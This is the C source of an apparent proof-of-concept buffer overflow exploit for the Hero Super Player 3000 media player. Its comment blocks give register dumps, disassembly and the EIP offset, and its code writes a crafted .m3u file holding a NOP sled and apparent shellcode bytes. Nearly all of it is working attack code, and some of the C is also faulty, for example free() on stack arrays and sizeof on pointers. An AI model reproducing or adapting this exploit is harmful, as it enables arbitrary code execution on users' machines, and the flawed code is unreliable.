|
/******************************************************
HERO SUPER PLAYER 3000 .M3U File Buffer Overflow POC *
by fl0 fl0w *
******************************************************
*/
/********************************************************
SOFTWARE INFORMATION *
The software video player supports almost all formats *
and disks, you don't need any other software player to *
play various video files. It can make obscure video *
has high definition and completely eliminate alias, *
also supports video desktop, resume playback and *
intellectual bookmark. It also provides audio formats *
conversion between AC3, MP3, and WAV, including CD *
ripping and video conversion between MPEG4 and AVI. *
********************************************************
*/
/***************************************
DEBUGGING INFORMATION *
EAX 00000000 *
ECX 00000000 *
EDX 7C90E514 ntdll.KiFastSystemCallRet *
EBX 000004ED *
ESP 0012ED48 *
EBP 000004ED *
ESI 00000001 *
EDI 7E42F3C2 USER32.SendMessageA *
EIP 00414141 Mmxado.00414141 *
****************************************
*/
/***************************************************************************************
ASSEMBLY *
00414141 FF7C ??? ; Unknown command*
00414143 43 INC EBX *
00414144 83C9 FF OR ECX,FFFFFFFF *
00414147 EB 46 JMP SHORT Mmxado.0041418F *
00414149 3D 21030000 CMP EAX,321 *
*
As you cand see the assembler has no clue what just happend ??? *
ahhahahha ,just kidding *
We own EIP register , just that the assembler copyes 1 NULL byte. *
The function Mmxado() causes the bug. *
This is info from Windows DEP *
AppName: mmxado.exe AppVer: 1.0.0.1 ModName: mmxado.exe *
ModVer: 1.0.0.1 Offset: 00014141 *
After more tests here is the assembly ,here we identify the origins of the bug *
*
0012EB0A 0000 ADD BYTE PTR DS:[EAX],AL *
0012EB0C 3B00 CMP EAX,DWORD PTR DS:[EAX] *
012EB0E 0000 ADD BYTE PTR DS:[EAX],AL *
0012EB10 2300 AND EAX,DWORD PTR DS:[EAX] *
It adds to EAX a value that it cannot handle. *
Then compares the new value with the old one *
and it rezults in setting the Z FLAG with 0 as a rezult of false *
Snip *
Z 0 DS 0023 32bit 0(FFFFFFFF) *
Snip *
The EIP OFFSET is 253 bytes(0xFD). *
***************************************************************************************
*/
/*************************************************************************************
TECHNICALL INFORMATION *
Download the software from : *
http://www.download.com/Hero-Super-Player-3000/3000-2139_4-10401910.html?tag=lst-3 *
Note :After you open the TestFile click on DelUnselect,that's *
when the buffer overflow occurs. *
This POC has been tested on MS Windows Xp Sp3 English. *
This POC has been compiled with DEv-C++ 4.9.9.2 *
*************************************************************************************
*/
/*******************************************************************************
DEMO *
C:\Documents and Settings\Stefan\Desktop>hero.exe *
*
This POC was written for educational purpose. *
Use it at your own risk. *
Author will be not be responsible for any damage. *
*
PRESS 1 to CONTINUE *
*
PRESS 2 to EXIT *
1 *
********************************************************************* *
HERO SUPER PLAYER 3000 .M3U File Buffer Overflow POC *
The usage is: *
All Credits fl0 fl0w *
*
-f FILE *
********************************************************************* *
C:\Documents and Settings\Stefan\Desktop>hero.exe -f test *
FILE DONE ! *
The file is saved in the directory : C:\Documents and Settings\Stefan\De *
sktop *
********************************************************************************
*/
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "windows.h"
#include "stdint.h"
#include "getopt.h"
#include "unistd.h"
#define JUNK_SIZE 0x101 //257 bytes
#define SIZE 0x400
typedef struct Top {
uint8_t D;
uint8_t I;
uint8_t R;
}DIR;
typedef struct BOTTOM {
uint8_t E;
uint8_t X;
uint8_t T;
uint8_t N;
}EXTENSION;
void Usage ()
{ system("CLS");
printf("*********************************************************************\n");
fprintf ( stdout , "\t\tHERO SUPER PLAYER 3000 .M3U File Buffer Overflow POC\n");
printf("The usage is:\n");
fprintf ( stdout , "\t\tAll Credits fl0 fl0w\n");
}
void Menu()
{ fprintf(stderr,
"\n"
"\t-f FILE\n"
"*********************************************************************"
"\n");
}
uint32_t fletcher32(uint8_t data[SIZE], int16_t len)
{
uint32_t sum1 = 0xffff, sum2 = 0xffff;
while (len) {
unsigned tlen = len > 360 ? 360 : len;
len -= tlen;
do {
sum1 += *data++;
sum2 += sum1;
} while (--tlen);
sum1 = (sum1 & 0xffff) + (sum1 >> 16);
sum2 = (sum2 & 0xffff) + (sum2 >> 16);
}
sum1 = (sum1 & 0xffff) + (sum1 >> 16);
sum2 = (sum2 & 0xffff) + (sum2 >> 16);
return sum2 << 16 | sum1;
}
void buildFile(char *fname)
{ uint8_t JUNK[JUNK_SIZE] = {
0x90, 0x90, 0x90, 0x90, 0x90, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x90, 0x6A, 0x23, 0x59, 0xD9,
0xEE, 0xD9, 0x74, 0x24, 0xF4, 0x5B, 0x81, 0x73, 0x13, 0xEC, 0x61, 0x0E, 0x31, 0x83, 0xEB, 0xFC,
0xE2, 0xF4, 0x10, 0x89, 0x4A, 0x31, 0xEC, 0x61, 0x85, 0x74, 0xD0, 0xEA, 0x72, 0x34, 0x94, 0x60,
0xE1, 0xBA, 0xA3, 0x79, 0x85, 0x6E, 0xCC, 0x60, 0xE5, 0x78, 0x67, 0x55, 0x85, 0x30, 0x02, 0x50,
0xCE, 0xA8, 0x40, 0xE5, 0xCE, 0x45, 0xEB, 0xA0, 0xC4, 0x3C, 0xED, 0xA3, 0xE5, 0xC5, 0xD7, 0x35,
0x2A, 0x35, 0x99, 0x84, 0x85, 0x6E, 0xC8, 0x60, 0xE5, 0x57, 0x67, 0x6D, 0x45, 0xBA, 0xB3, 0x7D,
0x0F, 0xDA, 0x67, 0x7D, 0x85, 0x30, 0x07, 0xE8, 0x52, 0x15, 0xE8, 0xA2, 0x3F, 0xF1, 0x88, 0xEA,
0x4E, 0x01, 0x69, 0xA1, 0x76, 0x3D, 0x67, 0x21, 0x02, 0xBA, 0x9C, 0x7D, 0xA3, 0xBA, 0x84, 0x69,
0xE5, 0x38, 0x67, 0xE1, 0xBE, 0x31, 0xEC, 0x61, 0x85, 0x59, 0xD0, 0x3E, 0x3F, 0xC7, 0x8C, 0x37,
0x87, 0xC9, 0x6F, 0xA1, 0x75, 0x61, 0x84, 0x8E, 0xC0, 0xD1, 0x8C, 0x09, 0x96, 0xCF, 0x66, 0x6F,
0x59, 0xCE, 0x0B, 0x02, 0x6F, 0x5D, 0x8F, 0x4F, 0x6B, 0x49, 0x89, 0x61, 0x0E, 0x31, 0x90, 0x90,
0x90, 0x90, 0x90, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60,
0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x60, 0x63, 0x63,
0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x63, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x41, 0x41, 0x41,
0x41,
};
uint8_t w[SIZE];
uint8_t x[SIZE];
//Allocating memory for our 2 structures
DIR *Dr;
Dr = (DIR*)malloc(sizeof(DIR));
EXTENSION *ExT;
ExT = (EXTENSION*)malloc(sizeof(EXTENSION));
//buildind byte by byte the construction C:\
Dr->D = 0x43;
Dr->I = 0x3A;
Dr->R = 0x5C;
memcpy(x, Dr, sizeof(Dr));
fletcher32(x, SIZE);
//buildind byte by byte the construction .MP3
ExT->E = 0x2E;
ExT->X = 0x6D;
ExT->T = 0x70;
ExT->N = 0x33;
memcpy(w, ExT, sizeof(ExT));
fletcher32(w, SIZE);
//building our special binary .M3U FILE
FILE *f;
f = fopen(fname, "wb");
fwrite(x, sizeof(uint8_t), 3, f);
fwrite(JUNK, sizeof(uint8_t), sizeof(JUNK), f);
fwrite(w, sizeof(uint8_t), 4, f);
fclose(f);
free(x);
free(w);
}
int main(int argc, char *argv[])
{ if(argc < 2) {
Usage();
Menu();
exit(-1); }
uint8_t b[SIZE];
strcpy(b, argv[2]);
strcat(b, ".m3u");
buildFile(b);
printf("\tFILE DONE !\n");
char *path;
size_t size;
path = getcwd(path, size);
printf("\tThe file is saved in the directory : %s", path);
return 0;
}
|
推荐
评论(0条)
